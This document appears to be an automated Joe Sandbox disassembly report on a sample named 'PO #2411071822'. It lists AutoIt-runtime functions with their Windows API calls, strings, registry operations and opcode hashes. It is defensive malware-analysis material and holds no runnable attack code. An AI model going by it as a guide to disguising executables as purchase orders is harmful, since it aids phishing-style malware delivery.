                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode$DriveType
                                                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                              • API String ID: 2907320926-4222207086
                                                                                                              • Opcode ID: 1be02657b3cf8e4dbd4506bf4e17538a69700fc9e01e8951d8408da9f455649a
                                                                                                              • Instruction ID: 7c4694a997065cd8d0988c1eba4808677aae2e847e7cf3b099b11e8118758c05
                                                                                                              • Opcode Fuzzy Hash: 1be02657b3cf8e4dbd4506bf4e17538a69700fc9e01e8951d8408da9f455649a
                                                                                                              • Instruction Fuzzy Hash: E7510C30B1CB219F8714DF11E84192AB7A1FB55706BA0452BF0079B2E2CBA8ED46C74F
                                                                                                              Function 003ECC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __wcsnicmp
                                                                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                              • API String ID: 1038674560-86951937
                                                                                                              • Opcode ID: dbd8af81c3794326c7b877b29cea8ef6413961950f62f185815693531d3a34e0
                                                                                                              • Instruction ID: 603f39ace1b500c333e50fc677a6246897646c7a58a357404bc83bbf571ba38b
                                                                                                              • Opcode Fuzzy Hash: dbd8af81c3794326c7b877b29cea8ef6413961950f62f185815693531d3a34e0
                                                                                                              • Instruction Fuzzy Hash: 3C815931640265BBCB22BA66DD43FBF3768AF15301F14413BFD067A1C2E7A5DA06C298
                                                                                                              Function 0044C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0044C788
                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0044C83E
                                                                                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 0044C859
                                                                                                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044CB15
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 2326795674-4108050209
                                                                                                              • Opcode ID: 8171432dc333ed3d7aa17914bf8f5b6a88c7ab7f4de1a3b8833b8f1ab66a4896
                                                                                                              • Instruction ID: 6d3fc05277dc560dbbb0432239b7df9a6d8815152c837a8a72f56e960bb0d441
                                                                                                              • Opcode Fuzzy Hash: 8171432dc333ed3d7aa17914bf8f5b6a88c7ab7f4de1a3b8833b8f1ab66a4896
                                                                                                              • Instruction Fuzzy Hash: D3F1CF70606341ABF7618F24C8C5BABBBE4FF49354F0C052AF589D62A1D778D841CB9A
                                                                                                              Function 0044638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CharUpperBuffW.USER32(?,?,0047DC00), ref: 00446449
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BuffCharUpper
                                                                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                              • API String ID: 3964851224-45149045
                                                                                                              • Opcode ID: 0d7b4fbbe64c1c6f41e115b0b6325972f4eee9fc7a6ac497b2e5a7e9a8393f00
                                                                                                              • Instruction ID: 19ef0dca68471412f01efd045cb451639a13e132b15aab2a8c111d6f8283d55f
                                                                                                              • Opcode Fuzzy Hash: 0d7b4fbbe64c1c6f41e115b0b6325972f4eee9fc7a6ac497b2e5a7e9a8393f00
                                                                                                              • Instruction Fuzzy Hash: D5C1A4342042458BDB05EF10C551AAF7795AF96348F01486EF9855B3E2DB38ED4BCB8B
                                                                                                              Function 0044D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetSysColor.USER32(00000012), ref: 0044D5AE
                                                                                                              • SetTextColor.GDI32(?,?), ref: 0044D5B2
                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0044D5C8
                                                                                                              • GetSysColor.USER32(0000000F), ref: 0044D5D3
                                                                                                              • CreateSolidBrush.GDI32(?), ref: 0044D5D8
                                                                                                              • GetSysColor.USER32(00000011), ref: 0044D5F0
                                                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0044D5FE
                                                                                                              • SelectObject.GDI32(?,00000000), ref: 0044D60F
                                                                                                              • SetBkColor.GDI32(?,00000000), ref: 0044D618
                                                                                                              • SelectObject.GDI32(?,?), ref: 0044D625
                                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0044D644
                                                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0044D65B
                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0044D670
                                                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0044D698
                                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0044D6BF
                                                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0044D6DD
                                                                                                              • DrawFocusRect.USER32(?,?), ref: 0044D6E8
                                                                                                              • GetSysColor.USER32(00000011), ref: 0044D6F6
                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0044D6FE
                                                                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0044D712
                                                                                                              • SelectObject.GDI32(?,0044D2A5), ref: 0044D729
                                                                                                              • DeleteObject.GDI32(?), ref: 0044D734
                                                                                                              • SelectObject.GDI32(?,?), ref: 0044D73A
                                                                                                              • DeleteObject.GDI32(?), ref: 0044D73F
                                                                                                              • SetTextColor.GDI32(?,?), ref: 0044D745
                                                                                                              • SetBkColor.GDI32(?,?), ref: 0044D74F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                              • String ID:
                                                                                                              • API String ID: 1996641542-0
                                                                                                              • Opcode ID: dc6ce94171eb419b7efa06880ba7ef30e0a9b8994e73c59c369fc9143c151029
                                                                                                              • Instruction ID: c4d7c50c98e8e087ded7a413fd7711fdaad2173f571f5fb10c8860bc6065f50a
                                                                                                              • Opcode Fuzzy Hash: dc6ce94171eb419b7efa06880ba7ef30e0a9b8994e73c59c369fc9143c151029
                                                                                                              • Instruction Fuzzy Hash: 6F514A71E00218BFDF109FA8DC48AEE7B79EF09324F114125FA15AB2A1E7B59A40CB55
                                                                                                              Function 0044B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0044B7B0
                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0044B7C1
                                                                                                              • CharNextW.USER32(0000014E), ref: 0044B7F0
                                                                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0044B831
                                                                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0044B847
                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0044B858
                                                                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0044B875
                                                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0044B8C7
                                                                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0044B8DD
                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 0044B90E
                                                                                                              • _memset.LIBCMT ref: 0044B933
                                                                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0044B97C
                                                                                                              • _memset.LIBCMT ref: 0044B9DB
                                                                                                              • SendMessageW.USER32 ref: 0044BA05
                                                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 0044BA5D
                                                                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 0044BB0A
                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0044BB2C
                                                                                                              • GetMenuItemInfoW.USER32(?), ref: 0044BB76
                                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0044BBA3
                                                                                                              • DrawMenuBar.USER32(?), ref: 0044BBB2
                                                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0044BBDA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 1073566785-4108050209
                                                                                                              • Opcode ID: b08d1e1f9d37da3684547efbe185ae2ebc55ee38c1b47e51f4a16b81f39fdb63
                                                                                                              • Instruction ID: 89334d523f7002ad3ee09c7441b4d81fe2ffd8d5167016ad45206fef4232bda6
                                                                                                              • Opcode Fuzzy Hash: b08d1e1f9d37da3684547efbe185ae2ebc55ee38c1b47e51f4a16b81f39fdb63
                                                                                                              • Instruction Fuzzy Hash: EFE19071900218ABEB20DF65CC84AEE7B78FF05714F10816BF915AA290D778D941DFA9
                                                                                                              Function 003E2EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Foreground
                                                                                                              • String ID: ACTIVE$ALL$CLASS$H+I$HANDLE$INSTANCE$L+I$LAST$P+I$REGEXPCLASS$REGEXPTITLE$T+I$TITLE
                                                                                                              • API String ID: 62970417-2066777689
                                                                                                              • Opcode ID: c32484879a46bfa684267a4d5697e3271636d87a98905ded044d974a585d1733
                                                                                                              • Instruction ID: d197d5c5816b1723c429a149bd275efa92dd73925362dfe559d7748a69cf11e2
                                                                                                              • Opcode Fuzzy Hash: c32484879a46bfa684267a4d5697e3271636d87a98905ded044d974a585d1733
                                                                                                              • Instruction Fuzzy Hash: D6D12830504642ABCB05EF21C9419ABBBB4BF55344F004A2FF845672E2DBB4E95FCB96
                                                                                                              Function 0044764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCursorPos.USER32(?), ref: 0044778A
                                                                                                              • GetDesktopWindow.USER32 ref: 0044779F
                                                                                                              • GetWindowRect.USER32(00000000), ref: 004477A6
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00447808
                                                                                                              • DestroyWindow.USER32(?), ref: 00447834
                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0044785D
                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0044787B
                                                                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 004478A1
                                                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 004478B6
                                                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004478C9
                                                                                                              • IsWindowVisible.USER32(?), ref: 004478E9
                                                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00447904
                                                                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00447918
                                                                                                              • GetWindowRect.USER32(?,?), ref: 00447930
                                                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00447956
                                                                                                              • GetMonitorInfoW.USER32 ref: 00447970
                                                                                                              • CopyRect.USER32(?,?), ref: 00447987
                                                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 004479F2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                              • String ID: ($0$tooltips_class32
                                                                                                              • API String ID: 698492251-4156429822
                                                                                                              • Opcode ID: 92fd49b1d87453485f9b94dc54f2b69b8c16c07cb9c5c12f563ed7e263af428a
                                                                                                              • Instruction ID: d13a66d2ca2df6d0fa4a4fd35b32dfdac62c41f139421948c63fd45b5d2832c7
                                                                                                              • Opcode Fuzzy Hash: 92fd49b1d87453485f9b94dc54f2b69b8c16c07cb9c5c12f563ed7e263af428a
                                                                                                              • Instruction Fuzzy Hash: CCB1B171A08341AFE704DF65C948B5BBBE5FF88310F008A1EF5899B291D774E805CB9A
                                                                                                              Function 00426CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00426CFB
                                                                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00426D21
                                                                                                              • _wcscpy.LIBCMT ref: 00426D4F
                                                                                                              • _wcscmp.LIBCMT ref: 00426D5A
                                                                                                              • _wcscat.LIBCMT ref: 00426D70
                                                                                                              • _wcsstr.LIBCMT ref: 00426D7B
                                                                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00426D97
                                                                                                              • _wcscat.LIBCMT ref: 00426DE0
                                                                                                              • _wcscat.LIBCMT ref: 00426DE7
                                                                                                              • _wcsncpy.LIBCMT ref: 00426E12
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                              • API String ID: 699586101-1459072770
                                                                                                              • Opcode ID: cb2be6364255704a6b3176eb6e59aa1bf64a0f974a806a5bb6cd931a02ccbdd7
                                                                                                              • Instruction ID: 8db2160a0ce836709947cac81ef822a3e1167bb45ac0417e060996dffaa5c794
                                                                                                              • Opcode Fuzzy Hash: cb2be6364255704a6b3176eb6e59aa1bf64a0f974a806a5bb6cd931a02ccbdd7
                                                                                                              • Instruction Fuzzy Hash: C041E472A002147BEB05AB659C47FBF777CEF41314F24006BF905B61C2EA7C9A0196AA
                                                                                                              Function 003FA856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003FA939
                                                                                                              • GetSystemMetrics.USER32(00000007), ref: 003FA941
                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003FA96C
                                                                                                              • GetSystemMetrics.USER32(00000008), ref: 003FA974
                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 003FA999
                                                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 003FA9B6
                                                                                                              • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 003FA9C6
                                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 003FA9F9
                                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 003FAA0D
                                                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 003FAA2B
                                                                                                              • GetStockObject.GDI32(00000011), ref: 003FAA47
                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 003FAA52
                                                                                                                • Part of subcall function 003FB63C: GetCursorPos.USER32(000000FF), ref: 003FB64F
                                                                                                                • Part of subcall function 003FB63C: ScreenToClient.USER32(00000000,000000FF), ref: 003FB66C
                                                                                                                • Part of subcall function 003FB63C: GetAsyncKeyState.USER32(00000001), ref: 003FB691
                                                                                                                • Part of subcall function 003FB63C: GetAsyncKeyState.USER32(00000002), ref: 003FB69F
                                                                                                              • SetTimer.USER32(00000000,00000000,00000028,003FAB87), ref: 003FAA79
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                              • String ID: AutoIt v3 GUI
                                                                                                              • API String ID: 1458621304-248962490
                                                                                                              • Opcode ID: 68a7b0884a520c8a93aa871ba68a48ffc43275318d663ce9b52626f38206dfe0
                                                                                                              • Instruction ID: 2eeea49aa2a8a4c376b21ef0ebc7a91790f82d5064e2a7fd31f98e63c76a22f4
                                                                                                              • Opcode Fuzzy Hash: 68a7b0884a520c8a93aa871ba68a48ffc43275318d663ce9b52626f38206dfe0
                                                                                                              • Instruction Fuzzy Hash: BCB18FB1A0020AAFDB15DFA8DC45BAE7BB4FF08315F154229FA15E72A0D774E840CB56
                                                                                                              Function 00443639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00443735
                                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0047DC00,00000000,?,00000000,?,?), ref: 004437A3
                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 004437EB
                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00443874
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00443B94
                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00443BA1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$ConnectCreateRegistryValue
                                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                              • API String ID: 536824911-966354055
                                                                                                              • Opcode ID: ab1cd001263db679d01ae22f6334b5a7d28aa2db958b5c8fe6bd9b67bd6d256c
                                                                                                              • Instruction ID: 6fd32aeb5b17a410aa322cae7e1797e1a8ee406b80354f1a6a8d0a1513d0e720
                                                                                                              • Opcode Fuzzy Hash: ab1cd001263db679d01ae22f6334b5a7d28aa2db958b5c8fe6bd9b67bd6d256c
                                                                                                              • Instruction Fuzzy Hash: DD0299752046119FDB15EF15C881A2EB7E5FF88720F04855EF98A9B3A2CB34ED01CB89
                                                                                                              Function 00446BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00446C56
                                                                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00446D16
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BuffCharMessageSendUpper
                                                                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                              • API String ID: 3974292440-719923060
                                                                                                              • Opcode ID: d01b79ace68e8d19fe25d9dc1a0b4ab658d9c72866ff676d0dc4369ef5927530
                                                                                                              • Instruction ID: 6d54c34eb5036cd076fd28d6ac3fd0589b233bc0a1232b496f71245fe4ac4cd2
                                                                                                              • Opcode Fuzzy Hash: d01b79ace68e8d19fe25d9dc1a0b4ab658d9c72866ff676d0dc4369ef5927530
